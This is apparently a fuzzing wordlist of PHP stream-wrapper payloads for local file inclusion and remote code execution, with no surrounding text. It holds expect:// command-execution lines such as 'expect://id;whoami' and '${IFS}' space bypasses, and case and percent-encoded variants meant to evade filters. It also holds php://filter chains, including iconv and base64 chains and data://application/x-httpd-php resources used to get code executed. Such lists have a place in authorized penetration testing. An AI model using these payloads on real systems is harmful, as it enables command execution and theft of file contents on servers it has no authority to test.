php://input
PHP://input
Php://input
pHP://input
php://INPUT
php://Input
%70%68%70://input
php%3A%2F%2Finput
php://%69nput
php://in%70ut
php://inp%75t
php://inpu%74
p%68p://input
ph%70://input
%70hp://input
expect://id
expect://whoami
expect://hostname
expect://pwd
expect://date
expect://uptime
expect://echo test
expect://printf test
expect://echo $USER
expect://echo $HOME
expect://echo $PATH
expect://printenv USER
expect://printenv HOME
expect://printenv PATH
expect://env | grep USER
expect://env | grep HOME
expect://env | grep PATH
EXPECT://id
Expect://whoami
eXpEcT://hostname
%65%78%70%65%63%74://id
expect%3A%2F%2Fid
%65xpect://whoami
e%78pect://hostname
ex%70ect://id
exp%65ct://whoami
expe%63t://hostname
expec%74://id
expect://id;whoami
expect://id&&whoami
expect://id|whoami
expect://id||whoami
expect://cat%20test.txt
expect://cat%09test.txt
expect://cat${IFS}test.txt
expect://cat$IFS$9test.txt
data://text/plain,test
data://text/plain,hello world
data://text/plain;charset=utf-8,test
DATA://text/plain,test
Data://text/plain,test
dAtA://text/plain,test
%64%61%74%61://text/plain,test
data%3A%2F%2Ftext/plain,test
%64ata://text/plain,test
d%61ta://text/plain,test
data://text/%70lain,test
zip://test.zip
ZIP://test.zip
Zip://test.zip
%7a%69%70://test.zip
zip%3A%2F%2Ftest.zip
phar://test.phar
PHAR://test.phar
Phar://test.phar
%70%68%61%72://test.phar
phar%3A%2F%2Ftest.phar
glob://test
GLOB://test
Glob://test
%67%6c%6f%62://test
glob%3A%2F%2Ftest
file://test
FILE://test
File://test
%66%69%6c%65://test
file%3A%2F%2Ftest
php://stdin
php://stdout
php://stderr
php://memory
php://temp
PHP://stdin
PHP://STDIN
php://STDIN
%70%68%70://stdin
php%3A%2F%2Fstdin
PHP://stdout
PHP://STDOUT
php://STDOUT
%70%68%70://stdout
php%3A%2F%2Fstdout
PHP://stderr
PHP://STDERR
php://STDERR
%70%68%70://stderr
php%3A%2F%2Fstderr
PHP://memory
PHP://MEMORY
php://MEMORY
%70%68%70://memory
php%3A%2F%2Fmemory
PHP://temp
PHP://TEMP
php://TEMP
%70%68%70://temp
php%3A%2F%2Ftemp
php://fd/0
php://fd/1
php://fd/2
PHP://fd/0
php://FD/0
php://filter/read=convert.base64-encode/resource=php://input
php://filter/convert.base64-encode/resource=php://input
php://filter/read=string.rot13/resource=php://input
php://filter/write=string.rot13/resource=php://input
php://filter/zlib.deflate/resource=php://input
php://filter/zlib.inflate/resource=php://input
php://filter/bzip2.compress/resource=php://input
php://filter/bzip2.decompress/resource=php://input
php://filter/convert.iconv.utf-8.utf-7/resource=php://input
php://filter/convert.iconv.utf-8.utf-16/resource=php://input
php://filter/convert.iconv.utf-8.utf-16le/resource=php://input
php://filter/convert.iconv.utf-8.utf-16be/resource=php://input
php://filter/dechunk/resource=php://input
php://filter/consumed/resource=php://input
php://filter/string.toupper/resource=php://input
php://filter/string.tolower/resource=php://input
php://filter/string.strip_tags/resource=php://input
php://filter/convert.quoted-printable-encode/resource=php://input
php://filter/convert.quoted-printable-decode/resource=php://input
php://filter/convert.base64-encode|convert.base64-decode/resource=php://input
php://filter/convert.base64-decode|convert.base64-encode/resource=php://input
php://filter/string.rot13|string.rot13/resource=php://input
php://filter/read=convert.base64-encode|convert.base64-decode/resource=php://input
php://filter/convert.iconv.utf-8.utf-7|convert.base64-encode/resource=php://input
php://filter/convert.base64-encode|convert.iconv.utf-8.utf-7/resource=php://input
php://filter/zlib.deflate|convert.base64-encode/resource=php://input
php://filter/convert.base64-encode|zlib.deflate/resource=php://input
php://filter/string.strip_tags|convert.base64-encode/resource=php://input
php://filter/convert.base64-encode|string.strip_tags/resource=php://input
php://filter/string.rot13|convert.base64-encode/resource=php://input
php://filter/convert.base64-encode|string.rot13/resource=php://input
php://filter/string.toupper|string.tolower/resource=php://input
php://filter/string.tolower|string.toupper/resource=php://input
php://filter/convert.iconv.utf-8.utf-16|convert.iconv.utf-16.utf-8/resource=php://input
php://filter/convert.iconv.utf-8.utf-32|convert.iconv.utf-32.utf-8/resource=php://input
php://filter/zlib.deflate|zlib.inflate/resource=php://input
php://filter/zlib.inflate|zlib.deflate/resource=php://input
php://filter/bzip2.compress|bzip2.decompress/resource=php://input
php://filter/bzip2.decompress|bzip2.compress/resource=php://input
PHP://filter/convert.base64-encode/resource=php://input
Php://filter/read=string.rot13/resource=php://input
pHP://filter/convert.iconv.utf-8.utf-7/resource=php://input
php://FILTER/convert.base64-encode/resource=php://input
php://Filter/read=string.rot13/resource=php://input
php://FiLtEr/convert.base64-encode/resource=php://input
%70%68%70://filter/convert.base64-encode/resource=php://input
php%3A%2F%2Ffilter/convert.base64-encode/resource=php://input
php://%66ilter/convert.base64-encode/resource=php://input
php://filte%72/convert.base64-encode/resource=php://input
php://filter/con%76ert.base64-encode/resource=php://input
php://filter/convert.%62ase64-encode/resource=php://input
php://filter/convert.base64-encode/resource=%70%68%70://input
php://filter/read=convert.%62ase64-encode/resource=php://input
php://filter/read=string.%72ot13/resource=php://input
php://filter/convert.iconv.%75tf-8.utf-7/resource=php://input
php://filter/read=convert.base64-encode/resource=php://stdin
php://filter/convert.base64-encode/resource=php://stdin
php://filter/read=string.rot13/resource=php://stdin
php://filter/zlib.deflate/resource=php://stdin
php://filter/convert.iconv.utf-8.utf-7/resource=php://stdin
php://filter/read=convert.base64-encode/resource=php://stdout
php://filter/convert.base64-encode/resource=php://stdout
php://filter/read=convert.base64-encode/resource=php://stderr
php://filter/convert.base64-encode/resource=php://stderr
php://filter/read=convert.base64-encode/resource=php://memory
php://filter/convert.base64-encode/resource=php://memory
php://filter/read=convert.base64-encode/resource=php://temp
php://filter/convert.base64-encode/resource=php://temp
php://filter/read=convert.base64-encode/resource=php://fd/0
php://filter/convert.base64-encode/resource=php://fd/0
php://filter/read=convert.base64-encode/resource=php://fd/1
php://filter/convert.base64-encode/resource=php://fd/1
php://filter/read=convert.base64-encode/resource=php://fd/2
php://filter/convert.base64-encode/resource=php://fd/2
php://filter/convert.base64-decode/resource=data://text/plain;base64,
php://filter/read=convert.base64-decode/resource=data://text/plain;base64,
php://filter/convert.base64-decode/resource=data:text/plain;base64,
php://filter/read=convert.base64-decode/resource=data:text/plain;base64,
php://filter/convert.base64-decode/resource=data://application/x-httpd-php;base64,
php://filter/convert.base64-decode/resource=data:application/x-httpd-php;base64,
php://filter/string.rot13/resource=data://text/plain,
php://filter/read=string.rot13/resource=data://text/plain,
php://filter/string.rot13/resource=data:text/plain,
php://filter/zlib.inflate/resource=data://text/plain,
php://filter/read=zlib.inflate/resource=data://text/plain,
php://filter/bzip2.decompress/resource=data://text/plain,
php://filter/read=bzip2.decompress/resource=data://text/plain,
php://filter/convert.iconv.utf-7.utf-8/resource=data://text/plain,
php://filter/convert.iconv.utf-16.utf-8/resource=data://text/plain,
php://filter/convert.iconv.utf-16le.utf-8/resource=data://text/plain,
php://filter/convert.iconv.utf-16be.utf-8/resource=data://text/plain,
php://filter/convert.iconv.utf-32.utf-8/resource=data://text/plain,
php://filter/dechunk/resource=data://text/plain,
php://filter/consumed/resource=data://text/plain,
php://filter/string.toupper/resource=data://text/plain,
php://filter/string.tolower/resource=data://text/plain,
php://filter/string.strip_tags/resource=data://text/plain,
php://filter/convert.base64-decode/resource=php://filter/convert.base64-encode/resource=php://input
php://filter/string.rot13/resource=php://filter/string.rot13/resource=php://input
php://filter/zlib.inflate/resource=php://filter/zlib.deflate/resource=php://input
php://filter/convert.iconv.utf-7.utf-8/resource=php://filter/convert.iconv.utf-8.utf-7/resource=php://input
php://filter/convert.iconv.utf-16.utf-8/resource=php://filter/convert.iconv.utf-8.utf-16/resource=php://input
php://filter/read=convert.base64-decode/write=convert.base64-encode/resource=php://input
php://filter/read=convert.base64-encode/write=convert.base64-decode/resource=php://input
php://filter/read=string.rot13/write=string.rot13/resource=php://input
php://filter/read=zlib.deflate/write=zlib.inflate/resource=php://input
php://filter/read=zlib.inflate/write=zlib.deflate/resource=php://input
php://filter/read=bzip2.compress/write=bzip2.decompress/resource=php://input
php://filter/read=bzip2.decompress/write=bzip2.compress/resource=php://input
php://filter/read=string.toupper/write=string.tolower/resource=php://input
php://filter/read=string.tolower/write=string.toupper/resource=php://input
php://filter/read=convert.iconv.utf-8.utf-7/write=convert.iconv.utf-7.utf-8/resource=php://input
php://filter/convert.iconv.ISO-8859-1.UTF-8/resource=php://input
php://filter/convert.iconv.UTF-8.ISO-8859-1/resource=php://input
php://filter/convert.iconv.CP1252.UTF-8/resource=php://input
php://filter/convert.iconv.UTF-8.CP1252/resource=php://input
php://filter/convert.iconv.UCS-2.UTF-8/resource=php://input
php://filter/convert.iconv.UCS-4.UTF-8/resource=php://input
php://filter/convert.iconv.UTF-8.UCS-2/resource=php://input
php://filter/convert.iconv.UTF-8.UCS-4/resource=php://input
php://filter/convert.iconv.ASCII.UTF-8/resource=php://input
php://filter/convert.iconv.UTF-8.ASCII/resource=php://input
php://filter/convert.iconv.LATIN1.UTF-8/resource=php://input
php://filter/convert.iconv.LATIN2.UTF-8/resource=php://input
php://filter/convert.iconv.CP850.UTF-8/resource=php://input
php://filter/convert.iconv.CP852.UTF-8/resource=php://input
php://filter/convert.iconv.CP866.UTF-8/resource=php://input
php://filter/convert.iconv.KOI8-R.UTF-8/resource=php://input
php://filter/convert.iconv.KOI8-U.UTF-8/resource=php://input
php://filter/convert.iconv.UTF-8.CSISO2022KR|convert.base64-encode/resource=php://input
php://filter/convert.iconv.UTF-8.UTF7|convert.base64-decode/resource=php://input
php://filter/convert.iconv.UTF-8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF-8.UTF7/resource=php://input
php://filter/convert.base64-encode|convert.base64-encode|convert.base64-decode/resource=php://input
php://filter/convert.base64-encode|convert.base64-encode|convert.base64-decode|convert.base64-decode/resource=php://input
php://filter/read=convert.base64-encode|convert.base64-encode|convert.base64-decode|convert.base64-decode/resource=php://input
php://filter/convert.iconv.UTF-8.UTF-16LE|convert.iconv.UTF-16LE.UCS-2LE|convert.base64-encode/resource=php://input
php://filter/convert.iconv.UCS-2LE.UCS-2BE|convert.base64-encode/resource=php://input
php://filter/convert.iconv.UCS-4LE.UCS-4BE|convert.base64-encode/resource=php://input
php://filter/convert.iconv.UTF-16.UTF-16BE|convert.base64-encode/resource=php://input
php://filter/convert.iconv.UTF-16.UTF-16LE|convert.base64-encode/resource=php://input
php://filter/convert.iconv.UTF-32.UTF-32BE|convert.base64-encode/resource=php://input
php://filter/convert.iconv.UTF-32.UTF-32LE|convert.base64-encode/resource=php://input
php://filter/string.rot13|convert.iconv.utf-8.utf-7/resource=php://input
php://filter/convert.iconv.utf-8.utf-7|string.rot13/resource=php://input
php://filter/zlib.deflate|convert.iconv.utf-8.utf-7/resource=php://input
php://filter/convert.iconv.utf-8.utf-7|zlib.deflate/resource=php://input
php://filter/bzip2.compress|convert.iconv.utf-8.utf-7/resource=php://input
php://filter/convert.iconv.utf-8.utf-7|bzip2.compress/resource=php://input
php://filter/convert.base64-encode|zlib.deflate|convert.base64-encode/resource=php://input
php://filter/convert.base64-decode|zlib.inflate|convert.base64-decode/resource=php://input
php://filter/convert.base64-encode|bzip2.compress|convert.base64-encode/resource=php://input
php://filter/convert.base64-decode|bzip2.decompress|convert.base64-decode/resource=php://input
php://filter/string.rot13|string.toupper|string.tolower/resource=php://input
php://filter/string.toupper|string.rot13|string.tolower/resource=php://input
php://filter/string.tolower|string.rot13|string.toupper/resource=php://input
php://filter/convert.base64-encode|string.rot13|convert.base64-encode/resource=php://input
php://filter/convert.base64-decode|string.rot13|convert.base64-decode/resource=php://input
php://filter/zlib.deflate|zlib.deflate/resource=php://input
php://filter/zlib.inflate|zlib.inflate/resource=php://input
php://filter/bzip2.compress|bzip2.compress/resource=php://input
php://filter/bzip2.decompress|bzip2.decompress/resource=php://input
php://filter/convert.quoted-printable-encode|convert.quoted-printable-decode/resource=php://input
php://filter/convert.quoted-printable-decode|convert.quoted-printable-encode/resource=php://input
php://filter/dechunk|dechunk/resource=php://input
php://filter/consumed|consumed/resource=php://input
php://filter/string.strip_tags|string.strip_tags/resource=php://input
php://filter/convert.base64-encode|convert.base64-encode|convert.base64-encode/resource=php://input
php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=php://input
php://filter/string.rot13|string.rot13|string.rot13/resource=php://input
php://filter/string.toupper|string.toupper/resource=php://input
php://filter/string.tolower|string.tolower/resource=php://input
php://filter/convert.iconv.UTF-8.UTF-7|convert.iconv.UTF-7.UTF-8/resource=php://input
php://filter/convert.iconv.UTF-7.UTF-8|convert.iconv.UTF-8.UTF-7/resource=php://input
php://filter/convert.iconv.UTF-16LE.UTF-8|convert.iconv.UTF-8.UTF-16LE/resource=php://input
php://filter/convert.iconv.UTF-16BE.UTF-8|convert.iconv.UTF-8.UTF-16BE/resource=php://input
php://filter/convert.iconv.UTF-32LE.UTF-8|convert.iconv.UTF-8.UTF-32LE/resource=php://input
php://filter/convert.iconv.UTF-32BE.UTF-8|convert.iconv.UTF-8.UTF-32BE/resource=php://input
php://filter/resource=
php://filter/read=/resource=
php://filter/write=/resource=
PHP://filter/resource=
Php://filter/resource=
pHP://filter/resource=
php://Filter/resource=
php://FILTER/resource=
php://filter/Resource=
php://filter/RESOURCE=
ssh2.shell://
ssh2.exec://
ssh2.tunnel://
ssh2.sftp://
ssh2.scp://
rar://
ogg://
zlib://
compress.zlib://
compress.bzip2://
ftp://
ftps://
